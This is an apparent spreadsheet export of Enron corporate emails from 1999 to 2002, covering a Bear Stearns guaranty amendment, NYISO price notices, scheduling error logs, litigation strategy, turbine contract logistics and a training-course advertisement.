		 To: Cheryl Nelson/NA/Enron@Enron_x000D_
		 cc: Keegan Farrell/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: Re: Enron Corp./Enron Credit Inc. ("ECI") guaranty amendment _x000D_
(increase from USD25 Million to USD100 Million) in favor of Bear, Stearns, et _x000D_
al_x000D_
_x000D_
You may want to clarify this with Keegan as 1) your voice mail was full on _x000D_
that Friday, 2) Keegan tried to contact you in New York and the number she _x000D_
had for you was disconnected, and 3) we tried to locate the documents that _x000D_
Friday and were not able to._x000D_
_x000D_
_x000D_
_x000D_
	Cheryl Nelson_x000D_
	Sent by: Cheryl Nelson_x000D_
	05/21/2001 11:00 AM_x000D_
		_x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron, Tom _x000D_
Doukas/Enron@EnronXGate_x000D_
		 cc: Keegan Farrell/NA/Enron@Enron_x000D_
		 Subject: Re: Enron Corp./Enron Credit Inc. ("ECI") guaranty amendment _x000D_
(increase from USD25 Million to USD100 Million) in favor of Bear, Stearns, et _x000D_
al_x000D_
_x000D_
Sara, _x000D_
_x000D_
Moreover, Keegan represented to me that you requested that she locate for you _x000D_
the Securities Loan Agreement for you while I was out and that she went into _x000D_
my office and retrieved that document from my Enron Credit Inc. file and gave _x000D_
it to you.  So, I am not sure of the source of confusion about not being able _x000D_
to find my file but for future reference, the best thing to do is to ask _x000D_
Keegan how to contact me immediately and directly - when out the office she _x000D_
always knows how to reach me._x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693_x000D_
http://gss.enron.com/_x000D_
_x000D_
_x000D_
_x000D_
	Cheryl Nelson_x000D_
	Sent by: Cheryl Nelson_x000D_
	05/21/2001 10:36 AM_x000D_
		_x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: Stephanie Panus/NA/Enron@Enron, Tom Doukas/Enron@EnronXGate_x000D_
		 Subject: Re: Enron Corp./Enron Credit Inc. ("ECI") guaranty amendment _x000D_
(increase from USD25 Million to USD100 Million) in favor of Bear, Stearns, et _x000D_
al_x000D_
_x000D_
Sara: _x000D_
_x000D_
I will forward the documents to you.  _x000D_
_x000D_
For future reference, if anyone is looking for a file for an urgent matter _x000D_
while I am out, she should convey that fact to me by either (1) leaving a _x000D_
voice mail - as I checked my voicemails on Friday (that is how I was able to _x000D_
speak with Tom from New York on Friday) or (2) advise Keegan and she will _x000D_
contact me immediately by cell phone as she did regarding other matters on _x000D_
Friday._x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693_x000D_
http://gss.enron.com/_x000D_
_x000D_
_x000D_
_x000D_
	Sara Shackleton@ECT_x000D_
	05/15/2001 03:45 PM_x000D_
		 _x000D_
		 To: Cheryl Nelson/NA/Enron@Enron_x000D_
		 cc: Tom Doukas/Enron@EnronXGate, Stephanie Panus/NA/Enron@Enron_x000D_
		 Subject: Enron Corp./Enron Credit Inc. ("ECI") guaranty amendment (increase _x000D_
from USD25 Million to USD100 Million) in favor of Bear, Stearns, et al_x000D_
_x000D_
Cheryl:_x000D_
_x000D_
I spoke with Clem and he is preparing the amendment for immediate execution _x000D_
as the signers will be at an offsite tomorrow.  I'll let Tom know as soon as _x000D_
the amendment has been executed.  Anna Meytina is on vacation so I left a _x000D_
message with Sharon Chernick._x000D_
_x000D_
In order to complete our files with respect to the Enron North America Inc. _x000D_
("ENA") Securities Loan Agreement, please provide me with copies of the _x000D_
following documents:_x000D_
_x000D_
(1)  assignment of the Securities Loan Agreement from ENA to ECI (or was a _x000D_
separate agreement with ECI executed?)_x000D_
_x000D_
(2) termination of the prior Enron Corp. guaranty on behalf of ENA in the _x000D_
amount of  USD25 Million _x000D_
_x000D_
I spoke with Stephanie and she could not locate your Bear/ECI files on Friday _x000D_
of last week.  _x000D_
_x000D_
Thanks._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 04:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations 28 April 2001 Real-Time Market and 29 April_x000D_
	 2001 Day-Ahead Market</t>
  </si>
  <si>
    <t xml:space="preserve">CGoering@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hour beginning 05:00 in the April 28, 2001 Real-Time_x000D_
Market as well as the following hours per ECA20001006B to verify prices:_x000D_
_x000D_
PJM: 01:00, 03:00, 04:00, 06:00 and 21:00_x000D_
HQ:  06:00 and 21:00_x000D_
OH:  06:00 and 21:00_x000D_
NE:  06:00 and 21:00_x000D_
_x000D_
Prices in the April 29, 2001 Day-Ahead Market are correct._x000D_
_x000D_
This e-mail information is a copy of the official posting which can be found _x000D_
at_x000D_
the following address on our website:_x000D_
http://mis.nyiso.com/public/htm/OperMessages/CurrentOperMessages.htm#mm_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Nov 1999 11:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.haden@enron.com'})</t>
  </si>
  <si>
    <t>LCRA Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Jim,  Attached is a clean and redline version of your letter with my _x000D_
comments.  The deal maker on this one is probably the appropriate person to _x000D_
sign this one.  Is it Jim Ducote?_x000D_
_x000D_
Is Greg Brazaitis or Steve Schneider aware of this project?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 18:38:27 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/6/02; HourAhead hour: 21;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 2/6/02; HourAhead hour: 21;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020621.txt_x000D_
!!!General SQL error._x000D_
Couldn't update; currently locked by user 'Admin' on machine 'NAHOU-TRDTS5'._x000D_
Table_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstNW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 2/6/02_x000D_
  TIE_POINT: MALIN_5_RNDMTN_x000D_
  INTERCHG_ID: ENRJ_CISO_3000_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.metts@enron.com', 'mitchell.taylor@enron.com', 'mark.palmer@enron.com'})</t>
  </si>
  <si>
    <t>DeFazio</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Steven J Kean/NA/Enron on 05/11/2001 _x000D_
03:59 PM ---------------------------_x000D_
_x000D_
_x000D_
Linda Robertson_x000D_
05/11/2001 03:16 PM_x000D_
To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Paul _x000D_
Kaufman/Enron@EnronXGate, bandrews@quinngillespie.com_x000D_
cc: John Shelk/NA/Enron@Enron _x000D_
_x000D_
Subject: DeFazio_x000D_
_x000D_
Here's what John found.  We will follow up with DeFazio.  He is extremely _x000D_
liberal.   His credibility is highly linked to his highly liberal _x000D_
positions.   Most pundits will see this for what it is, given the source.  _x000D_
But we will see him soon._x000D_
----- Forwarded by Linda Robertson/NA/Enron on 05/11/2001 04:12 PM -----_x000D_
_x000D_
	John Shelk_x000D_
	05/11/2001 04:11 PM_x000D_
		 _x000D_
		 To: Linda Robertson/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
DeFazio's proposal is on the first page of his website._x000D_
_x000D_
http://www.house.gov/defazio/index.htm_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Sep 2001 05:36:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Longview</t>
  </si>
  <si>
    <t>Please set up this call. Rick McCombs in at Mayer Brown in Chicago. Also--get his direct no. and address and add them to my directory. Thanks._x000D_
-----Original Message-----_x000D_
From: Sanders, Richard B. _x000D_
Sent: Tuesday, September 11, 2001 7:34 AM_x000D_
To: Champion, John; Evans, Mark (London Legal)_x000D_
Cc: T Paul Johnson (Legal); Simons, Paul; Nissan, Limor; 'hmccombs@mayerbrown.com'; 'cwoods@mayerbrown.com'_x000D_
Subject: RE: Longview_x000D_
_x000D_
_x000D_
_x000D_
I spoke to Rick McCombs at Mayer Brown this morning and he informed me that he is in trial all week and unavailable for a call today. We agreed to a 7am central (1pm London and 8am New York) call on Thurs. to go over the answer and any other pending items. He promised a draft answer by  3 pm central on Wed afternoon. Hopefully, Paul will be well by then. I will set up a call-in number for the conference.._x000D_
 _x000D_
 -----Original Message-----_x000D_
From: Sanders, Richard B. _x000D_
Sent: Tuesday, September 11, 2001 6:18 AM_x000D_
To: Champion, John; Evans, Mark (London Legal)_x000D_
Cc: T Paul Johnson (Legal); Simons, Paul; Nissan, Limor_x000D_
Subject: RE: Longview_x000D_
_x000D_
_x000D_
I am trying to set up a conf. call today at 10:30 central to speak to the Chicago attys. Andy is not involved in this case. _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Champion, John _x000D_
Sent: Tuesday, September 11, 2001 5:36 AM_x000D_
To: Evans, Mark (London Legal)_x000D_
Cc: Sanders, Richard B.; Edison, Andrew; T Paul Johnson (Legal); Simons, Paul; Nissan, Limor_x000D_
Subject: RE: Longview_x000D_
_x000D_
_x000D_
Mark, fyi_x000D_
Paul J is away sick but asked me to deal with this.  I have also discussed with Paul S.  Conference call planned for 2pm today with Andy Edison to discuss this (and Kemper)._x000D_
 _x000D_
-----Original Message-----_x000D_
From: Evans, Mark (London Legal) _x000D_
Sent: 11 September 2001 09:45_x000D_
To: T Paul Johnson (Legal); Nissan, Limor; Simons, Paul_x000D_
Cc: Sanders, Richard B.; Edison, Andrew_x000D_
Subject: RE: Longview_x000D_
 _x000D_
Let's keep the pressure up by all means but I understand that an extension of this period is not hard to come by. _x000D_
 _x000D_
I assume you're talking about that with Andy, Paul J. _x000D_
J. Mark Evans _x000D_
Enron Europe Legal Department _x000D_
direct tel: 44 207 783 5424 _x000D_
direct fax: 44 207 783 8287 _x000D_
email: mark.evans@enron.com _x000D_
-----Original Message-----_x000D_
From: T Paul Johnson (Legal) _x000D_
Sent: 10 September 2001 11:09_x000D_
To: 'Woods, Craig A.'; Nissan, Limor; McCombs, Hugh R.; Forrester, J. Paul _x000D_
Cc: Raver, Carrie Marie ; Gamboa, Armando M.; Hahm, David ; Montz, Alex P.; Stoll, J. Robert ; Durkin, Thomas M.; Simons, Paul; Evans, Mark (London Legal); Sanders, Richard B.; Edison, Andrew_x000D_
Subject: RE: Longview_x000D_
PRIVILEGED AND CONFIDENTIAL_x000D_
REQUEST FOR LEGAL ADVICE_x000D_
 _x000D_
Thank you for the written advice. Obviously prospects of success assessed at "[no] more than 50%..." (ie. definitely less than 50%) is depressing, given initial expectations. We now need to maximise our bargaining power for acquisition of the smelter through the litigation which McCook have forced on us. _x000D_
 _x000D_
We look forward to receiving the draft Defence and Counterclaim for comments/approval. We will need this fairly urgently, since the 20 day period for service expires next Monday, 17 Sept 2001 (according to my calculations - please confirm). Can you please ensure that they are sent to all the copy parties on the email (now including Houston litigation dept). Thank you._x000D_
 _x000D_
Paul Johnson_x000D_
Enron legal dept_x000D_
-----Original Message-----_x000D_
From: Woods, Craig A. [mailto:cwoods@mayerbrown.com]_x000D_
Sent: 06 September 2001 16:58_x000D_
To: Groves, Robert; Heffron, Kevin; T Paul Johnson (Legal); McKey, Christopher; Michaud, Jean; Nissan, Limor_x000D_
Cc: Raver, Carrie Marie ; Gamboa, Armando M.; Hahm, David ; McCombs, Hugh R.; Montz, Alex P.; Stoll, J. Robert ; Forrester, J. Paul ; Durkin, Thomas M._x000D_
Subject: RE: Longview_x000D_
 _x000D_
PRIVILEGED AND CONFIDENTIAL _x000D_
All:  Attached is our follow-up memorandum regarding the merits of Enron's claim to enforce the Tolling Agreement against Longview.  Please feel free to contact either Rick or me if you have any questions._x000D_
   _x000D_
Craig A. Woods _x000D_
Mayer, Brown &amp; Platt _x000D_
190 S. LaSalle Street _x000D_
Chicago, IL 60603 _x000D_
(312) 701-8536 ph. _x000D_
(312) 706-8697 fax _x000D_
cwoods@mayerbrown.com _x000D_
 _x000D_
&lt;&lt;Merits_Memo.doc&gt;&gt; _x000D_
_x000D_
_x000D_
***********************************************************************_x000D_
NOTICE: This e-mail message and all attachments transmitted with it are_x000D_
intended solely for the use of the addressee and may contain legally privileged _x000D_
and confidential information. If the reader of this message is not the intended _x000D_
recipient, or an employee or agent responsible for delivering this message to _x000D_
the intended recipient, you are hereby notified that any dissemination, distribution,_x000D_
copying, or other use of this message or its attachments is strictly prohibited._x000D_
_x000D_
If you have received this message in error, please notify the sender immediately _x000D_
by e-mail reply and please delete this message from your computer._x000D_
Thank you. Mayer, Brown and Platt.</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Would you all be in a posiotion to get together tomorrow morning at 9:30 am _x000D_
Houston time to review the issues list and  talk about how we get to the end _x000D_
of this process with GE.  We immediately need to start the drafting of the _x000D_
Longview turbine contract and I'd like to see if we are close enough to get _x000D_
that started.  Scott, today the extension to the Agreement in Principle _x000D_
expires and we need to extend.  Can you tee this up with Steve Swift?  Our _x000D_
meeting tomorrow will be in lieu of the regularly scheduled GE call.  I'll _x000D_
let them know we will call them later this week or we'll talk next Wednesday, _x000D_
but I would like to get through whatever we need to in order to get the _x000D_
Longview Turbine Contract going.  _x000D_
I've talked to John Schwartzenburg about this and he is available tomorrow _x000D_
morning.</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Nothing is simple._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Barton Clark@ECT_x000D_
03/19/2001 03:16 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts  _x000D_
_x000D_
I had thought I would be the lawyer on the Mitsubishi consent, until I was _x000D_
removed two weeks ago in favor of Rose. Then I heard today from Ozzie that _x000D_
Rose was off and another ENA lawyer ( I don't know who) was heading up the _x000D_
effort with Mitsubishi. I didn't suggest you get involved, and as you can see _x000D_
I wasn't copied on any of the arrangements ( until you forwarded them to me _x000D_
). I think this is by design, as Ozzie has asked that I  focus my time on _x000D_
finalizing arrangements with FPUA, FMPA and Turbo Park. _x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	03/15/2001 04:29 PM_x000D_
		 _x000D_
		 To: Barton Clark/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts_x000D_
_x000D_
I'm not planning to get involved since this is your deal.  Is that ok with _x000D_
you?_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/15/2001 04:29 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
	Lorie Leigh @ ECT_x000D_
	03/15/2001 04:17 PM_x000D_
	_x000D_
To: Roseann Engeldorf/Enron@EnronXGate, Lisa Bills/Enron@EnronXGate, Kay _x000D_
Mann/Corp/Enron@Enron, Brett R Wiggs/SA/Enron@Enron, Ben F _x000D_
Jacoby/HOU/ECT@ECT, Mike Coleman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: CONFERENCE CALL - Next Thursday - Turbine Purchase Agmnts_x000D_
_x000D_
_x000D_
_x000D_
Conference Plus will be hosting this call:_x000D_
_x000D_
the date:  Thursday, March 22nd, 2001_x000D_
the number:  1-800-991-9019_x000D_
the passcode: 6871082#_x000D_
the time:  10:00 AM - 11:00 AM CST_x000D_
the place:  EB 3143C_x000D_
the subject:  Turbine 1 and Turbine 2 Purchase Agreement_x000D_
 _x000D_
If you have any problems or questions, please feel free to call me at _x000D_
713-853-1696._x000D_
_x000D_
Thank you,_x000D_
Lorie Leigh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 03:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'moazzam.khoja@enron.com'})</t>
  </si>
  <si>
    <t>Mission Energy : Legal Issues</t>
  </si>
  <si>
    <t>I spoke to Mark Taylor today and here's what he said about quoting names on _x000D_
Mission:_x000D_
_x000D_
1. It is generally more liberal to quote off-line than online._x000D_
2. It is very easy to quote when we are showing one price for a basket of _x000D_
names. As long as all names are equally divided. In fact legal team would _x000D_
have no objection if there are 10-15 names in the group and they are all _x000D_
equally weighted in exoposure._x000D_
3. As far as the specific list is concerned, he will get back with us with _x000D_
coments shortly._x000D_
_x000D_
Ted:_x000D_
Please let me know who will be replacing you on this deal once you rotate (if _x000D_
you are rotating)_x000D_
Also, do you have any indications on the weightage of each counter-party in _x000D_
the list._x000D_
_x000D_
Thanks and Regards_x000D_
Moazzam</t>
  </si>
  <si>
    <t>Tue, 11 Dec 2001 13:15:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'larry.berger@enron.com'})</t>
  </si>
  <si>
    <t>RE: NNG Reps out of office on Dec 13, 14 and 17</t>
  </si>
  <si>
    <t>Lynn, _x000D_
_x000D_
We can talk about this tomorrow morning, but I feel Jean Adams &amp; Kathy Sturr for South Central, and Pat Barry &amp; Renee for the North._x000D_
_x000D_
Larry_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Blair, Lynn  _x000D_
Sent:	Tuesday, December 11, 2001 2:13 PM_x000D_
To:	Berger, Larry_x000D_
Subject:	RE: NNG Reps out of office on Dec 13, 14 and 17_x000D_
_x000D_
	Larry, who would be two consistent people on each team to cover, Thursday, Friday, Monday and Tuesday?_x000D_
	Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Berger, Larry  _x000D_
Sent:	Tuesday, December 11, 2001 10:03 AM_x000D_
To:	Blair, Lynn; Zadow, Raetta_x000D_
Subject:	NNG Reps out of office on Dec 13, 14 and 17_x000D_
_x000D_
_x000D_
The following people will be out of the office on Dec 13, 14 and 17th:_x000D_
_x000D_
Dec 13 - South Central:  Debra Joe_x000D_
	North : Diana, James, Jerry, Nancy, Randy_x000D_
_x000D_
Dec 14 - South Central: Debra, Joe_x000D_
	North: Diana, James, Jerry, Kathy_x000D_
_x000D_
Dec 17 - South Central:  Janet, Robert, Sherry_x000D_
	North:  Karen, Nancy, Jean, Kathy_x000D_
_x000D_
_x000D_
Larry</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 06:27:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>1997 State Summary File</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. Taylor:_x000D_
I attach 3 files.  The WordPerfect definition/layout sheet may be used for all the State Summary Files sent with this and subsequent files sent in this series.  The WordPerfect v. 8 "Extract2.WPD" document may also be used with this, and the subsequent emails sent.  _x000D_
1) "EXTRACT2.WPD" is a WordPerfect v. 8 document that describes the process of inflating a self-extracting, compressed file.  The short version is to same the file to your hard disk.  Using Microsoft Windows Explorer, go to that saved file and double click on the file to begin the self-inflating process.  _x000D_
2) "STATESM.WPD" is a WordPerfect v. 8 document that may be used as a field layout/definition sheet for attachment #3._x000D_
3) "STATSM97.EXE" is a data file in Excel v. 5, compressed, self-extracting format._x000D_
_x000D_
I will send 3 more emails to you because the State Summary Files are rather large and I don't want to drag down our file server.  As I mentioned before, you may use the #1 &amp; #2 attachments for the remaining 3 emails.  _x000D_
_x000D_
I will send you the invoice as well as the data disks and supporting documents through the US Postal Service.  _x000D_
_x000D_
If you have any questions or need additional data, you may contact me at the locations listed below.  Thank you for the opportunity to serve your data request. _x000D_
Jim Parks_x000D_
PH     512 239-2544_x000D_
FAX   512 239-0888_x000D_
jparks@tnrcc.state.tx.us </t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 05:36:41 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/22/02; HourAhead hour: 8;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012208.txt_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database</t>
  </si>
  <si>
    <t>Wed, 13 Feb 2002 00:46:32 -0800 (PST)</t>
  </si>
  <si>
    <t>Derivatives Class April 9-10, Houston</t>
  </si>
  <si>
    <t>Kase's Derivatives For Energy Professionals_x000D_
April 9-10, 2002_x000D_
_x000D_
Register for more than one person or register for both classes_x000D_
and receive the "two or more discount"_x000D_
_x000D_
Learn Technical Analysis is scheduled for June_x000D_
_x000D_
_x000D_
Derivatives For Energy Professionals _x000D_
April 9-10, 2002_x000D_
_x000D_
The energy and power markets have experienced tremendous price fluctuations over the past few years as well as upheaval in the over-the-counter markets. The need for energy and power professionals to understand derivatives, and to measure and mitigate risk is even greater than ever. _x000D_
_x000D_
*	Valuing Market Risk_x000D_
*	Buying and Selling Forward_x000D_
*	Hedging Long and Short Positions_x000D_
*	Hedging Spreads and Basis_x000D_
*	Volatility and Options_x000D_
*	Hedging with Options_x000D_
*	Hedging with "Exotics"_x000D_
*	Dealing with Credit Risk_x000D_
_x000D_
April 9-10, 2002_x000D_
Early Bird Discount until March 11_x000D_
Houston, Texas _x000D_
_x000D_
Click Here for More Information:_x000D_
http://www.kaseco.com/classes/derivatives.htm_x000D_
_x000D_
Click Here to Register_x000D_
http://www.kaseco.com/classes/register/register_choice.htm_x000D_
_x000D_
_x000D_
_x000D_
Learn Technical Analysis_x000D_
June 11-12, 2002_x000D_
_x000D_
In today's volatile energy markets, those who are able to make objective buy and sell decisions can make significant profits and greatly improve cash flow for themselves or their companies. _x000D_
_x000D_
*	Charting Basics, Types of Charts, Support and Resistance_x000D_
*	When to Buy or Sell_x000D_
*	When to Exit Based on Signals _x000D_
*	How to Exit Based on Stops _x000D_
*	Chart Patterns and Forecasting Basics _x000D_
*	Statistical Hedging_x000D_
_x000D_
 _x000D_
June 11-12, 2002_x000D_
Early Bird Discount until May 13 _x000D_
Houston, Texas  _x000D_
_x000D_
Click Here for More Information_x000D_
http://www.kaseco.com/classes/tech_analysis.htm_x000D_
_x000D_
Click Here to Register _x000D_
http://www.kaseco.com/classes/register/register_choice.htm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
This email has been sent to lindy.donoho@enron.com at your_x000D_
request, by PowerMarketers.com._x000D_
_x000D_
Visit our Subscription Center to edit your interests or unsubscribe._x000D_
http://ccprod.roving.com/roving/d.jsp?p=oo&amp;m=1000838503237&amp;ea=lindy.donoho@enron.com_x000D_
_x000D_
View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp_x000D_
_x000D_
Powered by_x000D_
Constant Contact(R)_x000D_
www.constantcontact.com</t>
  </si>
  <si>
    <t>Thu, 14 Mar 2002 08:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jim.wallace@enron.com'})</t>
  </si>
  <si>
    <t>Trent Mesa WTG #79 data</t>
  </si>
  <si>
    <t xml:space="preserve">Jim,_x000D_
_x000D_
Attached is our report for WTG 79 which answers the questions posed by _x000D_
Eickoff.  Please note that we provided more information than we were asked _x000D_
for in anticipation of additional questions from them, yourself and _x000D_
engineering.  In the attached report we have provided graphs which cover the _x000D_
previous month (versus the previous week), the production since commissioning _x000D_
(through February), and a fault list._x000D_
_x000D_
The gaps in the data occur wherever the SCADA system did not record data or _x000D_
it was corrupted in some way.  Please note the fault data is particularly _x000D_
susceptible to data integrity problems but it does appear that we had pretty _x000D_
good data recovery during this period._x000D_
_x000D_
In the graph section we included a graph of Gen rpm/rotor rpm which should _x000D_
yield the gearbox gear ratio (a constant).  However, interestingly enough the _x000D_
values fluctuated from time to time which we cannot explain._x000D_
_x000D_
We will have Trent Mesa WTG #30 for you tomorrow morning._x000D_
_x000D_
Best Regards,_x000D_
Hollis_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 01:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Turbine Purchase - Letter Agreement</t>
  </si>
  <si>
    <t>How does Wednesday look for a conference call?_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 04:42:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'adriana.wynn@enron.com'})</t>
  </si>
  <si>
    <t>Re: CAF - Tier 1 - OVERDUE - (Req# 599) is overdue...</t>
  </si>
  <si>
    <t>I think I get this everyday now. Can you help get this cleared up? Thanks._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 05:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I extended the rental on the apartment until the 20th of November._x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
10/30/2000 01:31 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Houston trip_x000D_
_x000D_
Shirley,_x000D_
_x000D_
I hope it's OK with the apartment company._x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 10/30/2000 _x000D_
01:38 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp. - Europe_x000D_
	_x000D_
	From:  Sharad Agnihotri                           10/30/2000 11:40 AM_x000D_
	_x000D_
_x000D_
To: Paulo Issler/HOU/ECT@ECT, Zimin Lu/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Houston trip_x000D_
_x000D_
Hi All,_x000D_
_x000D_
I am hoping to come to Houston from the 5th to the 17th of November._x000D_
Sorry about the short notice._x000D_
_x000D_
Looking forward to seeing you._x000D_
_x000D_
Sharad Agnihotri_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Ava-35842/Market Services Council Mtg. conference room 42C2</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Ava-35842/Market Services Council Mtg. conference room 42C2_x000D_
_x000D_
Date:		8/23/2001_x000D_
Time:		10:30 AM - 12:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Re: Meeting with Da Mayor</t>
  </si>
  <si>
    <t>Didn't you want to send this to Steffes?</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 15:00:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>We have any contract in the cross (short?) hairs?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kaufman, Paul  _x000D_
Sent:	Thursday, October 11, 2001 5:00 PM_x000D_
To:	Dasovich, Jeff_x000D_
Subject:	RE: _x000D_
_x000D_
a.o.k.  Everything's fine.  Thanks for catching me up on the actions of those commies over in Nevada.  For a Republican stronghold, they act suspiciously like Democrats.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dasovich, Jeff  _x000D_
Sent:	Thursday, October 11, 2001 2:45 PM_x000D_
To:	Kaufman, Paul_x000D_
Subject:	_x000D_
_x000D_
On a more serious note (notes).  Sue's out sick today (caught something in Houston, it seems). And seriously, I hope the meeting went well.</t>
  </si>
  <si>
